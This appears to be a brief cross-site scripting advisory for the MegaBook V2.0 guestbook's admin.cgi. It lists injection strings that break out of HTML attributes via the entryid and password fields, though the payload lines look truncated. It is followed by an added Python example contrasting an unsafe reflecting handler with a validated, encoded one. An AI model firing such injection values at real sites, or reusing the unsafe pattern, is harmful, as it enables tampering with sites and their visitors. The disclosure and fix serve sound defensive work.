Article author: SpyHat

The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected script is admin.cgi.

URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)

I have tested the script with the following query:

?action=modifypost&entryid=">

I have also tested the script with these POST variables:

action=modifypost&entryid=66&password=
action=modifypost&entryid=66&password='>
action=modifypost&entryid=66&password=">
action=modifypost&entryid=66&password=>
action=modifypost&entryid=66&password=
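The fix for this class of bug, as an added example that is not MegaBook's code: a hypothetical handler for the modifypost form that reflects entryid and password verbatim, beside a hardened version that validates entryid as a number, never echoes the password, and encodes anything written into an attribute. The form markup, function names and the constructed test inputs are assumptions; the page does not show admin.cgi's source.

```python
import html
import re
from urllib.parse import parse_qs

# Hypothetical form template: the page does not show admin.cgi's real markup.
FORM = ('<form method="post" action="admin.cgi">'
        '<input type="hidden" name="action" value="modifypost">'
        '<input type="hidden" name="entryid" value="{entryid}">'
        '<input type="password" name="password" value="{password}">'
        '</form>')

ENTRYID_RE = re.compile(r"[0-9]{1,10}")


def attr(value):
    """Encode a value for a quoted HTML attribute (covers <, >, &, " and ')."""
    return html.escape(value, quote=True)


def render_unsafe(query):
    """Reflects both parameters verbatim: the pattern the advisory describes."""
    params = parse_qs(query, keep_blank_values=True)
    return FORM.format(entryid=params.get("entryid", [""])[0],
                       password=params.get("password", [""])[0])


def render_safe(query):
    """Return (HTTP status, body) with entryid validated and output encoded."""
    params = parse_qs(query, keep_blank_values=True)
    entryid = params.get("entryid", [""])[0]
    # entryid is a record number, so anything but digits is rejected outright.
    if not ENTRYID_RE.fullmatch(entryid):
        return 400, "invalid entryid"
    # The submitted password is never written back into the page.
    return 200, FORM.format(entryid=attr(entryid), password="")
```

Validation alone would cover entryid, but the encoding step is what protects any other field that has to be echoed, so both are kept.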